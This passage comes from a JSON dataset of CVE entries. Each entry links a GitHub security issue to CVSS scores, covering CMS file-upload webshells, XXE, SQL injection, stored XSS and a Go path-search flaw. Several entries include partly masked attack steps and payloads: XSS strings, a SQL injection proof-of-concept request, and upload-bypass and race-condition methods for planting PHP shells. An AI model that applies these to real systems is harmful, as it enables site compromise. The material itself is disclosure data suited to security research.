  58120. "severity": "MEDIUM",
  58121. "baseScore": 5.4,
  58122. "impactScore": 2.7,
  58123. "exploitabilityScore": 2.3
  58124. },
  58125. {
  58126. "CVE_ID": "CVE-2020-25881",
  58127. "Issue_Url_old": "https://github.com/AubreyJun/cms/issues/2",
  58128. "Issue_Url_new": "https://github.com/aubreyjun/cms/issues/2",
  58129. "Repo_new": "aubreyjun/cms",
  58130. "Issue_Created_At": "2020-09-15T10:19:11Z",
  58131. "description": "There is a directory traversal vulnerability at attachment deletion NUMBERTAG Deploy the RKCMS locally NUMBERTAG Create a file, such as FILETAG FILETAG NUMBERTAG Log in to the application NUMBERTAG Delete an attachment\uff0ccapture this packet, change the filename parameter to PATHTAG in this request FILETAG FILETAG NUMBERTAG FILETAG was deleted FILETAG NUMBERTAG The source code for this function is in FILETAG FILETAG NUMBERTAG The filename parameter does not have any filtering FILETAG",
  58132. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  58133. "severity": "MEDIUM",
  58134. "baseScore": 5.5,
  58135. "impactScore": 3.6,
  58136. "exploitabilityScore": 1.8
  58137. },
  58138. {
  58139. "CVE_ID": "CVE-2020-25911",
  58140. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/15237",
  58141. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/15237",
  58142. "Repo_new": "modxcms/revolution",
  58143. "Issue_Created_At": "2020-09-16T14:33:59Z",
  58144. "description": "XXE Vulnerability. Firstly, the website for security vulnerability reports does not work, so I have to report the problem here. There is a very serious XXE vulnerability in PATHTAG which could lead to sensitive information leakage or an APITAG attack. In function APITAG , the user input is parsed directly without any sanitization. When the content type is APITAG , it will lead to an XXE attack. ERRORTAG",
  58145. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  58146. "severity": "CRITICAL",
  58147. "baseScore": 9.1,
  58148. "impactScore": 5.2,
  58149. "exploitabilityScore": 3.9
  58150. },
  58151. {
  58152. "CVE_ID": "CVE-2020-25912",
  58153. "Issue_Url_old": "https://github.com/symphonycms/symphonycms/issues/2924",
  58154. "Issue_Url_new": "https://github.com/symphonycms/symphonycms/issues/2924",
  58155. "Repo_new": "symphonycms/symphonycms",
  58156. "Issue_Created_At": "2020-09-21T02:52:43Z",
  58157. "description": "XXE Vulnerability. FILETAG public static function APITAG $xml) { $doc = new APITAG 'utf NUMBERTAG doc APITAG return APITAG $doc); } Crafted user input could lead to an XXE vulnerability as external entity loading is not disabled here.",
  58158. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  58159. "severity": "CRITICAL",
  58160. "baseScore": 9.1,
  58161. "impactScore": 5.2,
  58162. "exploitabilityScore": 3.9
  58163. },
  58164. {
  58165. "CVE_ID": "CVE-2020-26007",
  58166. "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/48",
  58167. "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/48",
  58168. "Repo_new": "gongfuxiang/shopxo",
  58169. "Issue_Created_At": "2020-09-21T12:31:22Z",
  58170. "description": "There are some vulnerabilities in the upload payment plugin can get webshell. When uploading payment plug ins, attackers can bypass file verification and upload malicious php files by constructing the code of the php file in the zip compression package. Even uploading the php file without constructing the code will trigger the file containment vulnerability or upload files through competitive upload In the Upload method in the PATHTAG file, the file_put_contents function parameter is controllable FILETAG But later call APITAG method to do file verification, if the file verification is not passed, the file will be deleted In the APITAG method, the class_exists function checks whether the class is defined, the class uses the fully qualified name, and then it checks whether there are three methods defined in the class FILETAG According to this, the attacker only needs to define a class in the PHP file, define the namespace, and define the three methods mentioned above in order to pass the verification. The complete code is as follows: ERRORTAG Finally, the method is called in PATHTAG FILETAG After logging in to the background, upload the zip package containing FILETAG at the site management > payment method > upload FILETAG Visit PATHTAG FILETAG Not by constructing code: The first is file inclusion. The class_exists function will call the autoload function by default. The definition of the autoload function is found in PATHTAG FILETAG APITAG is the function of thinkphp to find files. It is mainly loaded through psr NUMBERTAG and classmap. The fully qualified name of the class we passed in is returned by the APITAG function and finally spliced into the complete file path. FILETAG Finally, the autoload function calls the __include_file function, and this function directly performs the file include operation FILETAG At this point, we have not entered the following file deletion operation but included the file, and the code will also be executed. 
Upload the zip archive containing the php file at the same location, the code content is: APITAG Although the upload failed message is returned after uploading, the code has been included and executed The file is created in FILETAG under the root directory of shopxo installation, visit FILETAG FILETAG There are also problems with uploading files and then deleting files. If there is no file included here, there is another way to upload files is competitive upload, because there is a time difference from file verification to file deletion, and you can keep uploading while keeping access. I use burpsuite's intruder module to keep sending packages and python scripts to keep accessing FILETAG The Python script is as follows: APITAG Upload the php file in the compressed package as follows: APITAG The generated php file is in the extend\\payment directory Visit PATHTAG FILETAG",
  58171. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  58172. "severity": "HIGH",
  58173. "baseScore": 7.8,
  58174. "impactScore": 5.9,
  58175. "exploitabilityScore": 1.8
  58176. },
  58177. {
  58178. "CVE_ID": "CVE-2020-26008",
  58179. "Issue_Url_old": "https://github.com/gongfuxiang/shopxo/issues/47",
  58180. "Issue_Url_new": "https://github.com/gongfuxiang/shopxo/issues/47",
  58181. "Repo_new": "gongfuxiang/shopxo",
  58182. "Issue_Created_At": "2020-09-21T11:50:48Z",
  58183. "description": "There is a File upload vulnerability that can getshell. The file upload vulnerability here lies in the blacklist method used when verifying the suffix of the uploaded file. This verification method is not strict and is often bypassed by attackers in various ways The APITAG method in the PATHTAG file has a file creation operation, in which the input of the file_put_contents function is controllable FILETAG Line NUMBERTAG checks the file suffix name, here is the blacklist check FILETAG The value in the private static variable $exclude_ext is \u2018.php\u2019, which can easily be bypassed FILETAG There are many ways to bypass the blacklist verification of suffix names. Taking my local Windows system environment as an example, you can upload file names that do not conform to the Windows file naming rules APITAG The windows system will automatically remove the content behind the symbols that do not conform to the rules. You can change the file suffix in the linux environment and upload it to the website Through the audit of the APITAG method in the FILETAG file When the zip archive does not match the resource directory, it will jump out of the loop of reading the archive file FILETAG FILETAG FILETAG And the resource directory cannot be _controller_, because the directory corresponding to _controller_ exists, and the compressed package will be closed directly without entering the subsequent file writing operation FILETAG Finally, the method is called in the Upload method of the PATHTAG file FILETAG The attacker can upload such a compressed package after logging into the background system FILETAG And upload the compressed package at Application Center > Application Management > Upload Application FILETAG Visit PATHTAG FILETAG In PATHTAG there is also the same blacklist verification problem for uploaded files FILETAG The processing logic is very similar to the above file After logging in to the system, upload the zip archive at the site management 
> theme management > theme installation FILETAG Visit PATHTAG after uploading FILETAG",
  58184. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  58185. "severity": "HIGH",
  58186. "baseScore": 7.8,
  58187. "impactScore": 5.9,
  58188. "exploitabilityScore": 1.8
  58189. },
  58190. {
  58191. "CVE_ID": "CVE-2020-26045",
  58192. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/575",
  58193. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/575",
  58194. "Repo_new": "daylightstudio/fuel-cms",
  58195. "Issue_Created_At": "2020-09-23T07:57:39Z",
  58196. "description": "FUEL CMS NUMBERTAG allows SQL Injection via parameter 'name' in PATHTAG FUEL CMS NUMBERTAG allows SQL Injection via parameter 'name' in PATHTAG Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. FILETAG payload: a\")or APITAG Poc: POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Origin: URLTAG Connection: close Referer: URLTAG Cookie: APITAG APITAG APITAG APITAG APITAG Upgrade Insecure Requests NUMBERTAG Pragma: no cache Cache Control: no cache NUMBERTAG Content Disposition: form data; name=\"description\" adsf NUMBERTAG Content Disposition: form data; name=\"name\" a\")or APITAG NUMBERTAG Content Disposition: form data; name=\"exists_users NUMBERTAG Content Disposition: form data; name=\"other_perms FILETAG",
  58197. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58198. "severity": "CRITICAL",
  58199. "baseScore": 9.8,
  58200. "impactScore": 5.9,
  58201. "exploitabilityScore": 3.9
  58202. },
  58203. {
  58204. "CVE_ID": "CVE-2020-26046",
  58205. "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/574",
  58206. "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/574",
  58207. "Repo_new": "daylightstudio/fuel-cms",
  58208. "Issue_Created_At": "2020-09-23T07:36:11Z",
  58209. "description": "Stored XSS in PATHTAG Variables NUMBERTAG Stored xss in Blocks name FILETAG Refresh the page, it will trigger below APITAG Viewed\" menu FILETAG Front page\uff1a FILETAG payload: \"onmousemove=\"alert NUMBERTAG Stored xss in Navigation Label FILETAG FILETAG payload: APITAG NUMBERTAG Stored xss in Site Variables Name FILETAG FILETAG payload: \"onmousemove=\"alert(/site/)",
  58210. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  58211. "severity": "MEDIUM",
  58212. "baseScore": 5.4,
  58213. "impactScore": 2.7,
  58214. "exploitabilityScore": 2.3
  58215. },
  58216. {
  58217. "CVE_ID": "CVE-2020-26048",
  58218. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/7",
  58219. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/7",
  58220. "Repo_new": "cuppacms/cuppacms",
  58221. "Issue_Created_At": "2019-11-01T17:33:20Z",
  58222. "description": "Authenticated Remote code Execution. Affected software: APITAG Type of vulnerability: Remote code execution Discovered by: Yosri Debaibi Description: The file manager option allows admin users to upload images to the application, the rename function could be altered by the users, An authenticated attacker is able to upload a malicious file within an image extension (jpg,jpeg,png ..) and through a custom request using the rename function provided by the file manager is able to modify the image extension into php as a result executing php codes . Proof of concept: Step1: Login to the cuppa cms. Step2:URL: URLTAG Go to the File manager. FILETAG Step3: Upload our malicious php file with image extension in Upload_files. FILETAG Once it is uploaded the file is renamed with APITAG which it is located in PATHTAG as shown in the figure below FILETAG Step4: We launched our proxy to intercept the request then we will rename our file to FILETAG using rename button in the file manager. FILETAG Step5: We deleted the jpg extension from PATHTAG parameter to change our file name to FILETAG and forward the request to the server. FILETAG Step6: We had successfully uploaded our FILETAG in the server. FILETAG we executed our payload by accessing the url below FILETAG PHP code is executed. FILETAG",
  58223. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  58224. "severity": "HIGH",
  58225. "baseScore": 8.8,
  58226. "impactScore": 5.9,
  58227. "exploitabilityScore": 2.8
  58228. },
  58229. {
  58230. "CVE_ID": "CVE-2020-26148",
  58231. "Issue_Url_old": "https://github.com/mity/md4c/issues/130",
  58232. "Issue_Url_new": "https://github.com/mity/md4c/issues/130",
  58233. "Repo_new": "mity/md4c",
  58234. "Issue_Created_At": "2020-09-29T12:42:58Z",
  58235. "description": "Use of uninitialized value in the APITAG function. Hi, While fuzzing md4c NUMBERTAG with Honggfuzz, I found out that the APITAG function may use uninitialized memory. Attaching a reproducer (gzipped so APITAG accepts it): FILETAG Issue can be reproduced by running: APITAG ERRORTAG",
  58236. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  58237. "severity": "HIGH",
  58238. "baseScore": 7.5,
  58239. "impactScore": 3.6,
  58240. "exploitabilityScore": 3.9
  58241. },
  58242. {
  58243. "CVE_ID": "CVE-2020-26157",
  58244. "Issue_Url_old": "https://github.com/leanote/desktop-app/issues/353",
  58245. "Issue_Url_new": "https://github.com/leanote/desktop-app/issues/353",
  58246. "Repo_new": "leanote/desktop-app",
  58247. "Issue_Created_At": "2020-09-29T10:22:57Z",
  58248. "description": "Two XSS and RCE vulnerabilites through note titles in Leanote Desktop. I have tried to privately report these critical vulnerabilities for more than NUMBERTAG months now. My first report was on June NUMBERTAG Despite multiple follow ups, I have received no response at all and the vulnerabilities still remain. Unfortunately, this leaves public disclosure as my only option. I have found two trivial XSS vulnerabilities in the Leanote Desktop app that can easily be escalated into RCE as Node integration is enabled. Both vulnerabilities can be caused through the title of a note but they are separate issues. Below is the description of the vulnerabilities. Steps to reproduce NUMBERTAG Create a note using the browser with a APITAG element in the title, for example use the following title: APITAG NUMBERTAG To trigger the first vulnerability: Open Leanote Desktop and start syncing for new notes. As soon as the note from step NUMBERTAG is synced, the script will be executed. This can also be triggered by logging in on a new device or by forcing a resync NUMBERTAG To trigger the second vulnerability: Select the note from step NUMBERTAG and another note using the Shift or Ctrl key. While displaying the batch feature, the script is executed NUMBERTAG In both cases, the XSS can trivially be escalated to RCE as Node integration is enabled. This title would open the calculator on Windows for example: APITAG Affected version: Tested using the latest version NUMBERTAG from here: URLTAG Cause and suggested fixes: The first XSS vulnerability is likely caused by this code: URLTAG The title ( APITAG ) needs to be passed through the APITAG function that you have already implemented in both cases. The second XSS vulnerability is caused by this code: URLTAG Here, APITAG also needs to be passed through APITAG . The RCE escalation is caused by Node integration being enabled. 
This has been discouraged for a while now: URLTAG Severity: Both vulnerabilities can be triggered remotely by an attacker by sharing a note with a user. If a user imports a malicious note shared with them, the vulnerabilities are triggered. Both vulnerabilities allow for executing arbitrary code on the user's computer. This includes deleting files, installing malware, exfiltrating sensitive data, etc. As such, they should be classified as severe. Additional notes: Leanote Desktop uses Electron version NUMBERTAG This version is very old and has numerous publicly known vulnerabilities. I strongly suggest you update to a newer version of Electron and implement the best practices described here: URLTAG",
  58249. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  58250. "severity": "CRITICAL",
  58251. "baseScore": 9.6,
  58252. "impactScore": 6.0,
  58253. "exploitabilityScore": 2.8
  58254. },
  58255. {
  58256. "CVE_ID": "CVE-2020-26160",
  58257. "Issue_Url_old": "https://github.com/dgrijalva/jwt-go/issues/422",
  58258. "Issue_Url_new": "https://github.com/dgrijalva/jwt-go/issues/422",
  58259. "Repo_new": "dgrijalva/jwt-go",
  58260. "Issue_Created_At": "2020-07-30T00:20:45Z",
  58261. "description": "Security Vulnerability: failed type assertion leads to bypassing Audience verification. if APITAG happens to be APITAG , as allowed by the spec, the type assertion fails and the value of aud is APITAG . This can cause audience verification to succeed even if the audiences being passed are incorrect if required is set to false . URLTAG ERRORTAG URLTAG",
  58262. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58263. "severity": "HIGH",
  58264. "baseScore": 7.5,
  58265. "impactScore": 3.6,
  58266. "exploitabilityScore": 3.9
  58267. },
  58268. {
  58269. "CVE_ID": "CVE-2020-26160",
  58270. "Issue_Url_old": "https://github.com/dgrijalva/jwt-go/issues/462",
  58271. "Issue_Url_new": "https://github.com/dgrijalva/jwt-go/issues/462",
  58272. "Repo_new": "dgrijalva/jwt-go",
  58273. "Issue_Created_At": "2021-04-09T18:34:18Z",
  58274. "description": "Migrating Maintenance. See NUMBERTAG I haven't had time to maintain this project for quite a while. I originally made it just for myself, but it appears to have become quite popular. It seems like the best course of action would be to clone this into its own org and then set this repo up to mirror that one until users can fully migrate over. That's probably also a good opportunity to correctly implement go mod support. Does anybody want to take over as maintainer? It looks like APITAG already exists as a github org. Name ideas?",
  58275. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  58276. "severity": "HIGH",
  58277. "baseScore": 7.5,
  58278. "impactScore": 3.6,
  58279. "exploitabilityScore": 3.9
  58280. },
  58281. {
  58282. "CVE_ID": "CVE-2020-26161",
  58283. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6622",
  58284. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6622",
  58285. "Repo_new": "octopusdeploy/issues",
  58286. "Issue_Created_At": "2020-10-11T22:50:29Z",
  58287. "description": "Self hosted Octopus susceptible to host header injection attacks. APITAG you a customer of Octopus Deploy? Don't raise the issue here. Please contact FILETAG so we can triage your report, making sure it's handled appropriately._ Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . x] I have raised a CVE according to our [CVE process URLTAG x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description The HTTP to HTTPS redirection middleware will accept the given Host header to generate the redirection URL. This can be exploited to hijack requests when Octopus is behind a caching reverse proxy. Affected versions Octopus Server NUMBERTAG to Current Links CVE: [ CVETAG URLTAG Internal Issue: URLTAG PR: URLTAG",
  58288. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  58289. "severity": "MEDIUM",
  58290. "baseScore": 6.1,
  58291. "impactScore": 2.7,
  58292. "exploitabilityScore": 2.8
  58293. },
  58294. {
  58295. "CVE_ID": "CVE-2020-26161",
  58296. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6627",
  58297. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6627",
  58298. "Repo_new": "octopusdeploy/issues",
  58299. "Issue_Created_At": "2020-10-13T21:49:42Z",
  58300. "description": "Self hosted Octopus susceptible to host header injection attacks. APITAG you a customer of Octopus Deploy? Don't raise the issue here. Please contact FILETAG so we can triage your report, making sure it's handled appropriately._ Prerequisites x] We are ready to publicly disclose this vulnerability or exploit according to our [responsible disclosure process URLTAG . x] I have raised a CVE according to our [CVE process URLTAG x] I have written a descriptive issue title [x] I have linked the original source of this report [x] I have tagged the issue appropriately (area/security, kind/bug, tag/regression?) Description The HTTP to HTTPS redirection middleware will accept the given Host header to generate the redirection URL. This can be exploited to hijack requests when Octopus is behind a caching reverse proxy. Affected versions Octopus Server NUMBERTAG to Current Links CVE: [ CVETAG URLTAG Internal Issue: URLTAG PR: URLTAG",
  58301. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  58302. "severity": "MEDIUM",
  58303. "baseScore": 6.1,
  58304. "impactScore": 2.7,
  58305. "exploitabilityScore": 2.8
  58306. },
  58307. {
  58308. "CVE_ID": "CVE-2020-26208",
  58309. "Issue_Url_old": "https://github.com/Matthias-Wandel/jhead/issues/7",
  58310. "Issue_Url_new": "https://github.com/matthias-wandel/jhead/issues/7",
  58311. "Repo_new": "matthias-wandel/jhead",
  58312. "Issue_Created_At": "2020-10-22T09:49:38Z",
  58313. "description": "heap buffer overflow on jhead NUMBERTAG APITAG APITAG poc\uff1a CVETAG ERRORTAG",
  58314. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H",
  58315. "severity": "MEDIUM",
  58316. "baseScore": 6.1,
  58317. "impactScore": 4.2,
  58318. "exploitabilityScore": 1.8
  58319. },
  58320. {
  58321. "CVE_ID": "CVE-2020-26214",
  58322. "Issue_Url_old": "https://github.com/alerta/alerta/issues/1277",
  58323. "Issue_Url_new": "https://github.com/alerta/alerta/issues/1277",
  58324. "Repo_new": "alerta/alerta",
  58325. "Issue_Created_At": "2020-07-27T20:14:49Z",
  58326. "description": "Disallow LDAP anonymous bind. URLTAG",
  58327. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58328. "severity": "CRITICAL",
  58329. "baseScore": 9.8,
  58330. "impactScore": 5.9,
  58331. "exploitabilityScore": 3.9
  58332. },
  58333. {
  58334. "CVE_ID": "CVE-2020-26235",
  58335. "Issue_Url_old": "https://github.com/time-rs/time/issues/293",
  58336. "Issue_Url_new": "https://github.com/time-rs/time/issues/293",
  58337. "Repo_new": "time-rs/time",
  58338. "Issue_Created_At": "2020-11-10T10:22:10Z",
  58339. "description": "The call to APITAG may be unsound. Because getenv and setenv are not thread-safe, APITAG in time may race with APITAG in libstd. I described this problem in chrono issue URLTAG, and time is also affected.",
  58340. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  58341. "severity": "MEDIUM",
  58342. "baseScore": 5.3,
  58343. "impactScore": 3.6,
  58344. "exploitabilityScore": 1.6
  58345. },
  58346. {
  58347. "CVE_ID": "CVE-2020-26238",
  58348. "Issue_Url_old": "https://github.com/jmrozanec/cron-utils/issues/461",
  58349. "Issue_Url_new": "https://github.com/jmrozanec/cron-utils/issues/461",
  58350. "Repo_new": "jmrozanec/cron-utils",
  58351. "Issue_Created_At": "2020-11-21T10:46:17Z",
  58352. "description": "Fix security vulnerability regarding the Hibernate dependency.",
  58353. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  58354. "severity": "HIGH",
  58355. "baseScore": 8.1,
  58356. "impactScore": 5.9,
  58357. "exploitabilityScore": 2.2
  58358. },
  58359. {
  58360. "CVE_ID": "CVE-2020-26243",
  58361. "Issue_Url_old": "https://github.com/nanopb/nanopb/issues/615",
  58362. "Issue_Url_new": "https://github.com/nanopb/nanopb/issues/615",
  58363. "Repo_new": "nanopb/nanopb",
  58364. "Issue_Created_At": "2020-11-24T17:26:04Z",
  58365. "description": "Memory leak when parsing a protobuf message with duplicate fields. Hello, While fuzzing a project that relies on Nanopb to parse (untrusted) user input, I found a memory leak which is triggered by sending a message in which fields are duplicated. Steps to reproduce the issue In order to test this memleak on several versions of Nanopb (and several Linux distributions), I have written the following script: ERRORTAG What happens? On an up-to-date Debian NUMBERTAG machine, this leads to the following output: ERRORTAG With my program, APITAG leaks NUMBERTAG bytes, APITAG leaks NUMBERTAG bytes, etc. What should happen? I believe that parsing untrusted input should not leak allocated memory. You might disagree with this belief, in which case it would be nice to indicate in URLTAG that Nanopb may leak memory when parsing untrusted data which was maliciously crafted.",
  58366. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  58367. "severity": "HIGH",
  58368. "baseScore": 7.5,
  58369. "impactScore": 3.6,
  58370. "exploitabilityScore": 3.9
  58371. },
  58372. {
  58373. "CVE_ID": "CVE-2020-26256",
  58374. "Issue_Url_old": "https://github.com/C2FO/fast-csv/issues/540",
  58375. "Issue_Url_new": "https://github.com/c2fo/fast-csv/issues/540",
  58376. "Repo_new": "c2fo/fast-csv",
  58377. "Issue_Created_At": "2020-11-30T14:21:13Z",
  58378. "description": "Security Issue: Request for contact. Hello, The FILETAG has found a potential vulnerability in your project. Please create a Security Advisory URLTAG and invite me in to further disclose and discuss the vulnerability details and potential fix. Alternatively, please add a Security Policy URLTAG containing a security email address to send the details to. Kind regards, A",
  58379. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  58380. "severity": "MEDIUM",
  58381. "baseScore": 6.5,
  58382. "impactScore": 3.6,
  58383. "exploitabilityScore": 2.8
  58384. },
  58385. {
  58386. "CVE_ID": "CVE-2020-26284",
  58387. "Issue_Url_old": "https://github.com/golang/go/issues/38736",
  58388. "Issue_Url_new": "https://github.com/golang/go/issues/38736",
  58389. "Repo_new": "golang/go",
  58390. "Issue_Created_At": "2020-04-29T00:09:12Z",
  58391. "description": "Unsecure path search in os/exec. APITAG What version of Go are you using ( go version )? APITAG $ go version go version APITAG windows/amd NUMBERTAG APITAG Originally noticed with Go NUMBERTAG though. Does this issue reproduce with the latest release? Yes What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env set GO NUMBERTAG MODULE= set GOARCH=amd NUMBERTAG set GOBIN= set PATHTAG set PATHTAG set FILETAG set GOFLAGS= set GOHOSTARCH=amd NUMBERTAG set GOHOSTOS=windows set GOINSECURE= set GONOPROXY= set GONOSUMDB= set GOOS=windows set PATHTAG set GOPRIVATE= set GOPROXY= URLTAG set GOROOT=C:\\Go set APITAG set GOTMPDIR= set PATHTAG set GCCGO=gccgo set AR=ar set CC=gcc set CXX=g++ set CGO_ENABLED NUMBERTAG set GOMOD= set CGO_CFLAGS= g O2 set CGO_CPPFLAGS= set CGO_CXXFLAGS= g O2 set CGO_FFLAGS= g O2 set CGO_LDFLAGS= g O2 set PKG_CONFIG=pkg config set GOGCCFLAGS= m NUMBERTAG mthreads fno caret diagnostics Qunused arguments fmessage length NUMBERTAG PATHTAG gno record gcc switches APITAG APITAG What did you do? APITAG Copy PATHTAG to the following program\u2019s directory as \u201c FILETAG \u201d and then run the program: APITAG package main import ( \"fmt\" \"os\" \"os/exec\" ) func APITAG { APITAG APITAG ) cmd := APITAG out, err := APITAG if err != nil { panic(err) } APITAG } APITAG What did you expect to see? The output of PATHTAG What did you see instead? The output of FILETAG (my username, since it is a copy of APITAG If the renamed copy of systeminfo.exe is removed from the test program\u2019s directory, then the output of PATHTAG is displayed as expected. 
Analysis PATHTAG contains the following: APITAG func APITAG string) (string, error) { \u2026 if APITAG APITAG ) { if f, err := APITAG exts); err == nil { return f, nil } else { return \"\", ERRORTAG err} } } if f, err := APITAG file), exts); err == nil { return f, nil } APITAG If the value of \u2018file\u2019 is an absolute or relative path, a result is returned. The concern is with a value which is only a name, such as APITAG One would expect this to search the list of paths found in the PATH environment variable, but before doing so the code explicitly searches the current working directory (\u201c.\u201d). There does not appear to be any means provided to disable this behavior and search only PATH. I would guess that the intent was to mimic the behavior of the FILETAG command shell, which searches the current directory first even if it is not specified in PATH. By comparison, the documentation for the Windows APITAG API indicates that it does not search PATH at all, but will use the current directory to complete a partial path. APITAG APITAG API offers an alternative, though also flawed, option to search the current directory last.) The problem is that it is not possible to use APITAG and thus APITAG to search the system PATH without searching the current directory. Thus even if diligence is taken to have the program set a secure PATH value, the programmer must be aware of this behavior and avoid using these standard library functions. The documentation of APITAG does not mention the current directory, stating only that it searches \u201cthe directories named by the PATH environment variable.\u201d Suggestions My preferred recommendation would be to remove the explicit search of \u201c.\u201d (the second if clause shown above), in order to provide the best level of security and comply with the documentation. A programmer can add \u201c.\u201d to the PATH environment variable value if the behavior is desired, as one would do in a linux/unix program. 
If the resulting change in Go behavior/compatibility is not desirable, a workaround could be for APITAG to reference the APITAG environment variable and avoid searching \u201c.\u201d if it is set. This is a workaround which Microsoft apparently added in Vista to disable the behavior in FILETAG . cc MENTIONTAG",
  58392. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
  58393. "severity": "HIGH",
  58394. "baseScore": 8.5,
  58395. "impactScore": 6.0,
  58396. "exploitabilityScore": 1.8
  58397. },
  58398. {
  58399. "CVE_ID": "CVE-2020-26287",
  58400. "Issue_Url_old": "https://github.com/hackmdio/codimd/issues/1630",
  58401. "Issue_Url_new": "https://github.com/hackmdio/codimd/issues/1630",
  58402. "Repo_new": "hackmdio/codimd",
  58403. "Issue_Created_At": "2020-12-20T21:27:54Z",
  58404. "description": "Stored XSS in mermaid. Hi, This weekend I played hxpctf; during the competition there was a challenge called hackme. It was a Docker with codimd. My solution was unintended: I used google analytics to exploit a stored xss bug in mermaid. Here is my FILETAG The bug seems to be known by the mermaid developers ( issue URLTAG . I tried it on FILETAG and it works, too. Hope you can fix soon! P.S. Now I'm going to reopen the issue in the mermaid repository Thanks Alessandro Mizzaro",
  58405. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
  58406. "severity": "HIGH",
  58407. "baseScore": 8.7,
  58408. "impactScore": 5.8,
  58409. "exploitabilityScore": 2.3
  58410. },
  58411. {
  58412. "CVE_ID": "CVE-2020-26296",
  58413. "Issue_Url_old": "https://github.com/vega/vega/issues/3018",
  58414. "Issue_Url_new": "https://github.com/vega/vega/issues/3018",
  58415. "Repo_new": "vega/vega",
  58416. "Issue_Created_At": "2020-12-21T10:54:25Z",
  58417. "description": "XSS in transform filter. This was found during the hxp ctf. Credit MENTIONTAG and his writeup URLTAG Describe how to reproduce the bug / the goal of the feature request: Paste the below JSON in the Vega Editor URLTAG . Working demo. URLTAG You will see a NUMBERTAG alert dialog. To my understanding you should not be able to run arbitrary JS using vega lite json, should you? Provide an example spec in JSON, wrapped by triple backticks like this: APITAG",
  58418. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N",
  58419. "severity": "HIGH",
  58420. "baseScore": 8.7,
  58421. "impactScore": 5.8,
  58422. "exploitabilityScore": 2.3
  58423. },
  58424. {
  58425. "CVE_ID": "CVE-2020-26299",
  58426. "Issue_Url_old": "https://github.com/autovance/ftp-srv/issues/225",
  58427. "Issue_Url_new": "https://github.com/autovance/ftp-srv/issues/225",
  58428. "Repo_new": "autovance/ftp-srv",
  58429. "Issue_Created_At": "2020-12-15T23:33:06Z",
  58430. "description": "Root escape through symlink. You can escape the root if there is a symlink within the FTP, so creating a symlink inside the root such as APITAG will allow you to access the server root",
  58431. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
  58432. "severity": "CRITICAL",
  58433. "baseScore": 9.6,
  58434. "impactScore": 5.8,
  58435. "exploitabilityScore": 3.1
  58436. },
  58437. {
  58438. "CVE_ID": "CVE-2020-26299",
  58439. "Issue_Url_old": "https://github.com/autovance/ftp-srv/issues/167",
  58440. "Issue_Url_new": "https://github.com/quorumdms/ftp-srv/issues/167",
  58441. "Repo_new": "quorumdms/ftp-srv",
